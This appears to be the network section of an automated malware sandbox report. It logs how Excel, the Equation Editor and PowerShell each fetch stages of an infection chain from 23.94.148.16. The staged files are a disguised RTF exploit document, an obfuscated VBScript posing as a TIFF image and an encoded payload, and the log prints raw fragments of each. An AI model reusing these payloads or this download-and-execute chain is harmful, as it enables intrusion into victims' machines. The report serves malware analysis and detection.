                                                      0192.168.2.224916223.94.148.16803416C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      TimestampBytes transferredDirectionData
                                                      Aug 31, 2024 15:50:58.102224112 CEST477OUTGET /90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 23.94.148.16
                                                      Connection: Keep-Alive
                                                      Aug 31, 2024 15:50:58.600771904 CEST1236INHTTP/1.1 200 OK
                                                      Date: Sat, 31 Aug 2024 13:50:58 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Thu, 29 Aug 2024 23:32:52 GMT
                                                      ETag: "19045-620dae4b80f82"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 102469
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/msword
                                                      Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 7b 5c 2a 5c 6c 65 76 65 6c 6e 75 6d 62 65 72 73 31 38 30 35 37 39 32 34 30 20 5c 25 7d 0d 7b 5c 32 38 35 35 34 38 35 32 25 3b 2a 36 2c 5b 3c 3f 7c 2a 3b 40 39 3f 28 3f 28 38 30 3f 2e 21 24 27 40 a7 40 7c 2a 3f 3f 3d 7e 2d 31 3f 33 33 37 31 2a 37 21 3c 5f 2e 34 23 2d 2c 39 28 3f 2e 29 2e b5 7e 5f 23 23 3b 33 3f 2b a7 37 2c 28 7e 2b 3c 3c 3f 29 29 21 29 b5 31 3e 23 5f 5f 35 2e 2e 3c 3a 2e 39 27 5e 7e 32 3d 30 35 38 25 5d 3a 40 34 7c 2b 33 31 29 a7 5e 3b 3f 3f b5 38 25 3d 3d 39 5b 2b 5f 38 2a 31 24 5e 25 2d 25 37 5d 40 3f 2d 2a 2a 35 3b 2b 26 28 24 7e 3f 3d 25 2c 3c 35 37 39 3b 3f 60 5d 40 31 33 3e 33 3b 28 36 3a 24 31 29 60 32 2a 3f 36 40 7c 3c 21 5b 39 37 32 2b 21 3a 31 60 3f 32 3c 2b 34 2f 7e 34 3b 34 b0 28 b0 39 26 3e 5e 5d 26 3f 35 32 30 5e 3f 2f 28 34 2e 60 b5 25 2e 27 25 3b 33 b0 3f 30 3c 36 40 5e 35 3e 25 35 7c 3b 2c 2e 38 3f 2a 35 32 2a 26 3e 24 3f 5f 38 24 b0 5f 31 3e 2c 5e 7c 29 29 2e 36 60 3c 7e 3f 40 27 3e 3f 25 7e 3f 3f 3e 38 3c 3f [TRUNCATED]
                                                      Data Ascii: {\rtf1{\*\levelnumbers180579240 \%}{\28554852%;*6,[<?|*;@9?(?(80?.!$'@@|*??=~-1?3371*7!<_.4#-,9(?.).~_##;3?+7,(~+<<?))!)1>#__5..<:.9'^~2=058%]:@4|+31)^;??8%==9[+_8*1$^%-%7]@?-**5;+&($~?=%,<579;?`]@13>3;(6:$1)`2*?6@|<![972+!:1`?2<+4/~4;4(9&>^]&?520^?/(4.`%.'%;3?0<6@^5>%5|;,.8?*52*&>$?_8$_1>,^|)).6`<~?@'>?%~??>8<?243>9-|`?$*966^'3+;-'5*+=+<4&808?7:|10.91!62^8*2[]?<#:&:2>%%5-8??%!%5)+?3(9?.5[~2'`?]88?>?&8+[2'*|?4^/>?=>3[&%!|_/9[;'#?|`+?@%606=#)4^?/`~9~,#1@=$$<&?@.$?5%'1*[7,472?2!9+^@0!?,>7324+<^3$$^89%,?#`==2+/_&)`#:?8(?;@4?>9_<8]1?)&0#1&!?[@(_^:&)(+[!0%<:'.|``]0|?;_?9.!>_1]?8%].(%7^;(+@?,!=]?'%#???4%2*???&5.]5&&~;#%?@%=(()-%^%0|?__]3%]_7`)^+3(+%!%%-]^)?>??=.)%=_*$:;?($%%91,*0$/<&[38$?|:=6.!9.$6/1+??%%-2<.#,%>![_?*>#@2;_67)/74|`??;&#1&6|,|1(9?3-36??%,2?`?8>@~*-274-&-0)1,&8.=528=29>6?|8>^(?/@]+?!'<(@*#0)|)32;2[?[.*?*;?`4=#-:`4?.^0-?[1*-8]'6_?57)%|
                                                      Aug 31, 2024 15:50:58.600795984 CEST1236INData Raw: 26 25 2e 7e 25 34 3f 28 2c 25 5d 3b 7e 5d 28 a7 b5 7c 60 36 27 31 a7 a7 2c 3f 21 24 b0 23 40 5f 25 23 60 60 3b a7 3d 7e 2b 27 28 5b 3f 37 5f b5 2a 34 31 34 2c 34 2f 34 3f 5f 35 40 32 30 38 24 3f 3b 60 a7 3f 3f 7c 3f 3a 32 7c b5 36 21 3f 21 29 39
                                                      Data Ascii: &%.~%4?(,%];~](|`6'1,?!$#@_%#``;=~+'([?7_*414,4/4?_5@208$?;`??|?:2|6!?!)9?*^???*#`1)(`'4??/<2.;6?55?'.9?+<8>|7<.1.1[%?*62@9,>!@*~==)&_7-~2??0#~9$6]|#/~7=#82|$|:1[!?'&+5,9#;+?2~;+?#[%;~9?1)0;>?=?:%40??_^~|)46%@+3~*!#%0`$802(~]
                                                      Aug 31, 2024 15:50:58.600806952 CEST1236INData Raw: 5f 28 23 2c 38 2f 5f 26 2e 29 21 40 39 3f 34 27 3c 3d 60 3f 2a b5 3a 37 2c 39 2a 3f 27 3e 31 34 2c 31 31 b0 26 39 2a 37 2b 3f 36 7c 5b 23 40 2a 25 2c 2c 23 3c 5f 5d 5b 35 33 3a 39 23 2e 33 25 3c 5e 35 b5 24 3b 2c 2c 25 40 31 3c 3e 3c 60 3a 25 3f
                                                      Data Ascii: _(#,8/_&.)!@9?4'<=`?*:7,9*?'>14,11&9*7+?6|[#@*%,,#<_][53:9#.3%<^5$;,,%@1<><`:%?-6'^'$3?=?5)<8>1+>*|>$-|^%2?;=&/?`))(@'=1$<%=9<<`6|*;,(.@~3=8~?;-.<?2);%@1@'2%+'/%~>$528_?^*8`>9*4(5]%'%5,?0^=!;&?8;,][!.;,?&*<=^68?=`5_75?-7+3$%;%/+,|>#?_
                                                      Aug 31, 2024 15:50:58.600816965 CEST1236INData Raw: 28 3f 37 24 27 23 b5 2a 5b 31 3f 3b 3f 2b 33 3a 5e 24 40 2d 3b 2a 3e 5f 36 31 5b 25 7c 27 3c 40 5e 3b 30 a7 60 5f a7 5d 3e 3c 3d 2e 3b 5d 3c 5e 40 2a 34 2e 3f 29 40 29 34 60 3b 3f 33 23 2e 34 21 29 2c 3d 29 3c 25 2d 23 b5 5b 2a 3f 60 36 26 26 2c
                                                      Data Ascii: (?7$'#*[1?;?+3:^$@-;*>_61[%|'<@^;0`_]><=.;]<^@*4.?)@)4`;?3#.4!),=)<%-#[*?`6&&,|~*+6'70')]8%<&_!%-4&3?]|%^#^.=7!>>(39_$%@`@2=~7`(@&=#@</;-%|''>`00[40;.&&9.;.3+62?-.3';@?8$#?/%=5[@%#74$:??1+?<`$`~^^*);/<*?[%~#$^/9$4;8.)0,@@1:8>;1
                                                      Aug 31, 2024 15:50:58.600827932 CEST1236INData Raw: 34 35 3b 34 3f 36 3c 38 2a 2e b5 24 38 28 5b 35 5f 3e 30 3f 30 3a 39 2b 30 33 b0 25 21 3f 40 29 21 3d 5d 2a 60 3c 3a 2c 5e 31 b0 2a 3f 37 5d 34 3f 7c 21 23 3f 2a 3b 3f 30 2f 3c 5e 30 25 39 36 38 31 38 3f 34 21 3e 3f 21 21 3e 23 25 5d 2b 24 60 32
                                                      Data Ascii: 45;4?6<8*.$8([5_>0?0:9+03%!?@)!=]*`<:,^1*?7]4?|!#?*;?0/<^0%96818?4!>?!!>#%]+$`2(<&+53<.7:09?.5=]=%<%!=?^^$_>=54;%|^'(])_.6@&(0%*.'114?_=#,?-!3??4_~$|&?>'%)])@,%-^)15^(998/0965_8/^;~#)4<-#|,;/?!?)?_0)(.?~6+|^%/:]?*+'64<?&44=#+
                                                      Aug 31, 2024 15:50:58.600832939 CEST1236INData Raw: 20 09 20 09 09 20 20 09 09 09 09 09 09 20 20 09 09 09 20 09 20 20 20 09 20 20 20 20 20 20 09 09 20 20 20 20 20 20 20 20 09 20 09 20 09 09 09 20 20 20 09 20 09 09 09 20 09 20 09 09 20 20 20 20 39 0a 0a 0d 0d 0d 0d 0a 0a 0a 0a 0d 0a 0a 0d 0a 0d 0d
                                                      Data Ascii: 9b30 402
                                                      Aug 31, 2024 15:50:58.600842953 CEST1236INData Raw: 09 20 20 20 20 20 09 09 20 20 20 20 30 30 09 20 09 09 09 20 20 20 20 20 09 20 09 20 09 09 20 20 09 20 20 20 09 20 09 20 09 20 09 20 09 20 20 09 09 09 20 09 20 20 09 09 20 09 20 09 09 09 20 09 20 20 20 20 20 09 20 09 20 20 20 20 20 09 09 20 20 20
                                                      Data Ascii: 00 000000 0000e607000002d
                                                      Aug 31, 2024 15:50:58.600852013 CEST1236INData Raw: 09 09 09 20 09 20 20 20 20 09 09 09 20 20 20 20 20 09 20 20 09 20 09 20 20 09 09 09 20 20 20 09 09 20 09 20 20 20 09 09 09 20 20 09 20 09 09 09 20 09 20 09 20 09 09 09 20 20 20 20 30 35 20 20 09 20 09 20 20 20 09 09 09 20 09 20 20 09 20 20 20 09
                                                      Data Ascii: 05 49 e7a7
                                                      Aug 31, 2024 15:50:58.600862026 CEST1236INData Raw: 31 63 0d 0d 0d 0d 0d 0d 0a 0a 0a 0a 0d 0a 0a 0d 0d 0d 0d 0d 0a 0d 0a 32 20 09 20 09 09 09 09 20 09 09 20 20 09 09 09 09 20 09 20 20 20 20 09 09 20 20 09 09 09 20 20 09 09 09 09 20 09 20 09 20 09 09 09 20 20 09 20 20 20 09 20 09 20 09 09 20 20 20
                                                      Data Ascii: 1c2 3407baaa d4
                                                      Aug 31, 2024 15:50:58.600872993 CEST1236INData Raw: 09 20 09 20 09 09 09 09 20 20 20 09 20 09 09 09 20 20 09 09 09 20 09 20 20 20 20 09 20 09 09 09 20 09 09 09 20 20 09 09 65 0d 0a 0a 0a 0d 0d 0a 0d 0a 0d 0a 0d 0d 0a 0a 0a 0d 0a 0d 0d 0d 61 09 20 09 09 09 09 20 20 20 20 20 20 09 20 09 20 09 20 20
                                                      Data Ascii: ea 09c8 c
                                                      Aug 31, 2024 15:50:58.605952024 CEST1236INData Raw: 20 09 20 09 20 20 09 09 09 09 20 09 09 09 09 09 20 09 20 20 20 09 09 20 20 09 20 09 20 20 09 20 09 20 09 20 09 20 20 09 20 09 20 09 20 09 09 09 09 20 20 09 09 31 34 66 20 20 09 20 20 20 09 20 09 20 09 09 20 09 20 20 20 09 20 09 20 20 09 09 09 09
                                                      Data Ascii: 14f 067f c


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.224916923.94.148.16803692C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      TimestampBytes transferredDirectionData
                                                      Aug 31, 2024 15:51:12.993789911 CEST290OUTHEAD /90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc HTTP/1.1
                                                      User-Agent: Microsoft Office Existence Discovery
                                                      Host: 23.94.148.16
                                                      Content-Length: 0
                                                      Connection: Keep-Alive
                                                      Aug 31, 2024 15:51:13.479738951 CEST323INHTTP/1.1 200 OK
                                                      Date: Sat, 31 Aug 2024 13:51:13 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Thu, 29 Aug 2024 23:32:52 GMT
                                                      ETag: "19045-620dae4b80f82"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 102469
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: application/msword


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.224917023.94.148.16803996C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      TimestampBytes transferredDirectionData
                                                      Aug 31, 2024 15:51:13.763609886 CEST336OUTGET /90/verynicebuttersmoothcakeicream.tIF HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: 23.94.148.16
                                                      Connection: Keep-Alive
                                                      Aug 31, 2024 15:51:14.246581078 CEST1236INHTTP/1.1 200 OK
                                                      Date: Sat, 31 Aug 2024 13:51:13 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Fri, 30 Aug 2024 01:22:53 GMT
                                                      ETag: "2cb2c-620dc6e2b6890"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 183084
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: image/tiff
                                                      Data Raw: ff fe 0d 00 0a 00 61 00 4f 00 4c 00 68 00 4b 00 66 00 4c 00 71 00 4a 00 55 00 20 00 3d 00 20 00 22 00 5a 00 6e 00 66 00 4c 00 57 00 6d 00 43 00 63 00 47 00 6e 00 22 00 0d 00 0a 00 55 00 7a 00 70 00 75 00 4c 00 4e 00 4e 00 66 00 4b 00 6b 00 20 00 3d 00 20 00 22 00 4f 00 65 00 68 00 41 00 51 00 57 00 55 00 78 00 4c 00 4c 00 22 00 0d 00 0a 00 4c 00 63 00 67 00 4f 00 47 00 4b 00 6d 00 4b 00 63 00 4c 00 20 00 3d 00 20 00 22 00 48 00 62 00 4c 00 6b 00 4c 00 74 00 4c 00 57 00 63 00 51 00 22 00 0d 00 0a 00 76 00 63 00 55 00 73 00 66 00 6c 00 5a 00 52 00 6c 00 43 00 20 00 3d 00 20 00 22 00 6d 00 4c 00 75 00 62 00 53 00 54 00 6b 00 4b 00 57 00 68 00 22 00 0d 00 0a 00 6b 00 4f 00 47 00 47 00 4a 00 41 00 6c 00 55 00 65 00 66 00 20 00 3d 00 20 00 22 00 5a 00 52 00 66 00 4b 00 7a 00 57 00 4c 00 5a 00 4a 00 62 00 22 00 0d 00 0a 00 55 00 7a 00 47 00 4f 00 68 00 62 00 69 00 57 00 57 00 55 00 20 00 3d 00 20 00 22 00 5a 00 68 00 69 00 4b 00 4a 00 4c 00 47 00 63 00 78 00 4c 00 22 00 0d 00 0a 00 52 00 4e 00 57 00 57 00 [TRUNCATED]
                                                      Data Ascii: aOLhKfLqJU = "ZnfLWmCcGn"UzpuLNNfKk = "OehAQWUxLL"LcgOGKmKcL = "HbLkLtLWcQ"vcUsflZRlC = "mLubSTkKWh"kOGGJAlUef = "ZRfKzWLZJb"UzGOhbiWWU = "ZhiKJLGcxL"RNWWPcWLpk = "inLcRaLORT"LJRHpWOLiA = "HANiCKKaoW"LlixubWiPa = "eCPxbZkAQc"caWilmiUZo = "PObfcPWtmW"pbnQmpoiKu = "QkZAvlIxcJ"PqiGNOkWuS = "uNUKciGpdh"UgnILezUit = "IWGcLuhWHk"oakCeoALzi = "PWZZKmAOlf"CNiPKnohse = "NGUqLdizGW"PcKPTWkeQL = "shNHbzkWTW"LNGLtAHidG = "khUhJAiZPW
                                                      Aug 31, 2024 15:51:14.246601105 CEST1236INData Raw: 00 22 00 0d 00 0a 00 0d 00 0a 00 50 00 63 00 5a 00 57 00 68 00 61 00 55 00 61 00 51 00 73 00 20 00 3d 00 20 00 22 00 63 00 63 00 76 00 47 00 47 00 6b 00 48 00 47 00 54 00 66 00 22 00 0d 00 0a 00 7a 00 7a 00 6b 00 50 00 78 00 4c 00 4b 00 4e 00 47
                                                      Data Ascii: "PcZWhaUaQs = "ccvGGkHGTf"zzkPxLKNGC = "SUNZkCApGd"mUNkAGmWGa = "kitbcKLGKi"hUzaUBiiqN = "WahkeKItqC"kWenPSkG
                                                      Aug 31, 2024 15:51:14.246613026 CEST1236INData Raw: 00 57 00 69 00 6b 00 69 00 41 00 70 00 62 00 63 00 6f 00 20 00 3d 00 20 00 22 00 69 00 6d 00 71 00 74 00 57 00 71 00 6b 00 6d 00 65 00 69 00 22 00 0d 00 0a 00 47 00 4a 00 65 00 66 00 63 00 67 00 4c 00 70 00 6b 00 57 00 20 00 3d 00 20 00 22 00 4c
                                                      Data Ascii: WikiApbco = "imqtWqkmei"GJefcgLpkW = "LmCnuhLqRq"eZKNsGLPNl = "fxhcLrkpAL"snPmZvWWSG = "xBrqGBbUAi"KzPWLLkiOo = "
                                                      Aug 31, 2024 15:51:14.246623993 CEST1236INData Raw: 00 57 00 75 00 57 00 22 00 0d 00 0a 00 51 00 6f 00 6c 00 57 00 50 00 5a 00 53 00 7a 00 6e 00 5a 00 20 00 3d 00 20 00 22 00 4c 00 75 00 47 00 4c 00 6d 00 47 00 69 00 6f 00 69 00 71 00 22 00 0d 00 0a 00 6d 00 65 00 5a 00 63 00 6c 00 41 00 74 00 78
                                                      Data Ascii: WuW"QolWPZSznZ = "LuGLmGioiq"meZclAtxgP = "ixfhdWNGWf"WPcAxtpLoT = "KobKveqcWv"cWfHpZiKLm = "cWbLiuZLiZ"xaOmBAo
                                                      Aug 31, 2024 15:51:14.246634960 CEST896INData Raw: 00 42 00 78 00 65 00 4c 00 65 00 73 00 47 00 69 00 55 00 47 00 22 00 0d 00 0a 00 57 00 4b 00 6c 00 65 00 49 00 4e 00 68 00 4f 00 4b 00 4e 00 20 00 3d 00 20 00 22 00 66 00 50 00 57 00 7a 00 70 00 4b 00 5a 00 73 00 4c 00 63 00 22 00 0d 00 0a 00 42
                                                      Data Ascii: BxeLesGiUG"WKleINhOKN = "fPWzpKZsLc"BkdWcZKKoh = "zvzCKCLZoW"CmCGKLRnOL = "GLxUkjKfiL"CWhczLJZlf = "bLWdLGKqUU"
                                                      Aug 31, 2024 15:51:14.246644020 CEST1236INData Raw: 00 0a 00 55 00 65 00 4b 00 65 00 43 00 62 00 4e 00 43 00 75 00 75 00 20 00 3d 00 20 00 22 00 54 00 47 00 4b 00 4c 00 47 00 74 00 70 00 4b 00 47 00 55 00 22 00 0d 00 0a 00 47 00 78 00 52 00 4c 00 73 00 6f 00 47 00 57 00 4c 00 4b 00 20 00 3d 00 20
                                                      Data Ascii: UeKeCbNCuu = "TGKLGtpKGU"GxRLsoGWLK = "LaWsconZGc"TULuCcNAbU = "fsKzKWGlCO"rxLWiIcKxu = "ZRBtjkkWUq"UPHWGrALKk =
                                                      Aug 31, 2024 15:51:14.246649027 CEST1236INData Raw: 00 69 00 53 00 75 00 4b 00 47 00 4f 00 4f 00 4b 00 65 00 57 00 22 00 0d 00 0a 00 55 00 50 00 51 00 47 00 75 00 48 00 4e 00 69 00 4c 00 4f 00 20 00 3d 00 20 00 22 00 7a 00 4c 00 41 00 47 00 4c 00 6e 00 66 00 57 00 78 00 41 00 22 00 0d 00 0a 00 47
                                                      Data Ascii: iSuKGOOKeW"UPQGuHNiLO = "zLAGLnfWxA"GsKRPiCONh = "UneTLkKgqi"AKcLZocKiG = "uLcLRLcecO"NKKWLWNtWK = "kvxKbhSLff"
                                                      Aug 31, 2024 15:51:14.246659994 CEST448INData Raw: 00 6b 00 4c 00 65 00 6b 00 22 00 0d 00 0a 00 64 00 4a 00 65 00 4c 00 7a 00 61 00 65 00 52 00 78 00 7a 00 20 00 3d 00 20 00 22 00 74 00 72 00 68 00 4e 00 41 00 69 00 69 00 57 00 57 00 69 00 22 00 0d 00 0a 00 0d 00 0a 00 61 00 64 00 4b 00 4b 00 4c
                                                      Data Ascii: kLek"dJeLzaeRxz = "trhNAiiWWi"adKKLhQGZA = "otLiHmeWLZ"lOpdWtldLi = "NcBhaZRWfi"KUCoxqiGuf = "vdGiqlxnmi"ohtK
                                                      Aug 31, 2024 15:51:14.246673107 CEST1236INData Raw: 00 0a 00 55 00 71 00 53 00 66 00 4c 00 5a 00 64 00 57 00 66 00 4a 00 20 00 3d 00 20 00 22 00 63 00 43 00 50 00 4f 00 63 00 41 00 57 00 61 00 7a 00 6e 00 22 00 0d 00 0a 00 4b 00 42 00 68 00 6f 00 4c 00 4e 00 55 00 69 00 55 00 63 00 20 00 3d 00 20
                                                      Data Ascii: UqSfLZdWfJ = "cCPOcAWazn"KBhoLNUiUc = "PJhnUczhGP"oWhnLzljWz = "HGZKZKWuLm"eULLCkGZCo = "aUUmdlLNcx"SRZpqbGxkP
                                                      Aug 31, 2024 15:51:14.246681929 CEST224INData Raw: 00 47 00 6f 00 4b 00 42 00 55 00 20 00 3d 00 20 00 22 00 57 00 6c 00 65 00 47 00 57 00 4e 00 57 00 7a 00 70 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 57 00 72 00 6e 00 69 00 62 00 4b 00 66 00 52 00 6e 00 66 00 20 00 3d 00 20 00 22 00 63 00 6b 00 68
                                                      Data Ascii: GoKBU = "WleGWNWzpL"WrnibKfRnf = "ckhlcWUjdx"TkfLWnGvkC = "tPUdfoGxfi"PPfQadiUpq = "UiAALNKvaI"iICPiAL
                                                      Aug 31, 2024 15:51:14.251570940 CEST1236INData Raw: 00 4c 00 6b 00 4b 00 20 00 3d 00 20 00 22 00 72 00 4c 00 61 00 4c 00 5a 00 41 00 71 00 4b 00 62 00 6f 00 22 00 0d 00 0a 00 47 00 4b 00 65 00 78 00 69 00 75 00 69 00 43 00 47 00 74 00 20 00 3d 00 20 00 22 00 68 00 42 00 62 00 5a 00 47 00 6b 00 4e
                                                      Data Ascii: LkK = "rLaLZAqKbo"GKexiuiCGt = "hBbZGkNcHK"uJULlKhdeK = "cHcaNCGKWW"GbLKLBdhvO = "WoLlhGnLLd"fLPiaUthjW = "cKpiKW


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.224917223.94.148.16802892C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 31, 2024 15:51:21.559240103 CEST73OUTGET /90/WEFV.txt HTTP/1.1
                                                      Host: 23.94.148.16
                                                      Connection: Keep-Alive
                                                      Aug 31, 2024 15:51:22.031624079 CEST1236INHTTP/1.1 200 OK
                                                      Date: Sat, 31 Aug 2024 13:51:21 GMT
                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                      Last-Modified: Thu, 29 Aug 2024 23:16:31 GMT
                                                      ETag: "c558-620daaa44438d"
                                                      Accept-Ranges: bytes
                                                      Content-Length: 50520
                                                      Keep-Alive: timeout=5, max=100
                                                      Connection: Keep-Alive
                                                      Content-Type: text/plain
                                                      Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                      Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031649113 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031666040 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031677961 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031696081 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
